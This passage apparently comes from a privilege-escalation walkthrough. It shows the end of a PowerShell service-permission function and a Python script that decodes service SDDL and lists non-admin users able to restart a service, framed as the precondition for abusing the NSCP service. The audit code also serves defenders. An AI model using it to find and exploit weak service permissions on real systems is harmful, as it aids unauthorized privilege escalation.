        $CustomObject | Add-Member -MemberType ScriptProperty -Name AccessToString -Value {
            $this.Access | ForEach-Object {
                "{0} {1} {2}" -f $_.IdentityReference, $_.AccessControlType, $_.ServiceRights
            } | Out-String
        }
 
        $CustomObject
    }
}
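As an added example (neither the page's nor Rohn Edwards' code), the same check the script above performs, done in Python on the SDDL string that `sc sdshow <service>` prints: each DACL entry's two-letter rights tokens are decoded into the ServiceAccessFlags values listed above, and the non-administrative principals whose allow entry grants both Start and Stop (the restart precondition the text describes) are reported. The SDDL string is constructed for illustration; the page never shows the real descriptor of the NSCP service, and the user SID in it is a placeholder.

```python
import re

# Service access bits, same numbering as the ServiceAccessFlags enum in the
# script above, keyed by the two-letter SDDL token 'sc sdshow' prints for them.
SERVICE_RIGHTS = {
    'CC': ('QueryConfig', 0x00001), 'DC': ('ChangeConfig', 0x00002),
    'LC': ('QueryStatus', 0x00004), 'SW': ('EnumerateDependents', 0x00008),
    'RP': ('Start', 0x00010), 'WP': ('Stop', 0x00020),
    'DT': ('PauseContinue', 0x00040), 'LO': ('Interrogate', 0x00080),
    'CR': ('UserDefinedControl', 0x00100), 'SD': ('Delete', 0x10000),
    'RC': ('ReadControl', 0x20000), 'WD': ('WriteDac', 0x40000),
    'WO': ('WriteOwner', 0x80000), 'GA': ('GenericAll', 0x10000000),
    'GX': ('GenericExecute', 0x20000000), 'GW': ('GenericWrite', 0x40000000),
    'GR': ('GenericRead', 0x80000000),
}

# Well-known SID abbreviations that appear in service descriptors.
WELL_KNOWN_SIDS = {
    'SY': 'NT AUTHORITY\\SYSTEM', 'BA': 'BUILTIN\\Administrators',
    'IU': 'NT AUTHORITY\\INTERACTIVE', 'SU': 'NT AUTHORITY\\SERVICE',
    'AU': 'NT AUTHORITY\\Authenticated Users', 'WD': 'Everyone',
}
PRIVILEGED = {'NT AUTHORITY\\SYSTEM', 'BUILTIN\\Administrators'}
RESTART_BITS = SERVICE_RIGHTS['RP'][1] | SERVICE_RIGHTS['WP'][1]

# Constructed descriptor: the usual default entries plus one extra allow ACE
# for a placeholder domain user SID that has been granted Start and Stop.
SAMPLE_SDDL = ("D:(A;;CCLCSWRPWPDTLOCRRC;;;SY)(A;;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;BA)"
               "(A;;CCLCSWLOCRRC;;;IU)(A;;CCLCSWLOCRRC;;;SU)"
               "(A;;CCLCSWRPWPLOCRRC;;;S-1-5-21-1111-2222-3333-1001)"
               "S:(AU;FA;CCDCLCSWRPWPDTLOCRSDRCWDWO;;;WD)")

DACL_RE = re.compile(r'D:[A-Z]*((?:\([^)]*\))*)')
ACE_RE = re.compile(r'\(([^;]*);([^;]*);([^;]*);([^;]*);([^;]*);([^)]*)\)')


def parse_rights(rights):
    """Turn an SDDL rights field (two-letter tokens or a 0x hex mask) into a bitmask."""
    if rights.lower().startswith('0x'):
        return int(rights, 16)
    mask = 0
    for i in range(0, len(rights), 2):
        token = rights[i:i + 2]
        if token not in SERVICE_RIGHTS:
            raise ValueError('unknown rights token %r' % token)
        mask |= SERVICE_RIGHTS[token][1]
    return mask


def rights_names(mask):
    """Names of the ServiceAccessFlags set in a mask, in enum order."""
    return [name for name, bit in SERVICE_RIGHTS.values() if mask & bit]


def parse_service_dacl(sddl):
    """Return the DACL entries as dicts: ACE type, principal, decoded mask."""
    m = DACL_RE.search(sddl)
    if not m:
        return []
    aces = []
    for ace_type, _flags, rights, _obj, _inh, sid in ACE_RE.findall(m.group(1)):
        aces.append({'type': ace_type,
                     'principal': WELL_KNOWN_SIDS.get(sid, sid),
                     'mask': parse_rights(rights)})
    return aces


def who_can_restart(sddl):
    """Non-admin principals with an allow ACE granting Start+Stop (or GenericAll)."""
    out = []
    for ace in parse_service_dacl(sddl):
        if ace['type'] != 'A' or ace['principal'] in PRIVILEGED:
            continue
        mask = ace['mask']
        if (mask & RESTART_BITS) == RESTART_BITS or mask & SERVICE_RIGHTS['GA'][1]:
            out.append(ace['principal'])
    return out


if __name__ == '__main__':
    for ace in parse_service_dacl(SAMPLE_SDDL):
        print(ace['type'], ace['principal'], ', '.join(rights_names(ace['mask'])))
    print('can restart:', who_can_restart(SAMPLE_SDDL))
```

Only the placeholder user SID is reported: INTERACTIVE and SERVICE hold query rights but not RP/WP, which is the default you want to see on a service that runs as SYSTEM. Running the same decode against the real `sc sdshow` output of the NSCP service is the quickest way to confirm or rule out the restart precondition the text mentions.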

Could not proceed any further from here (failed).
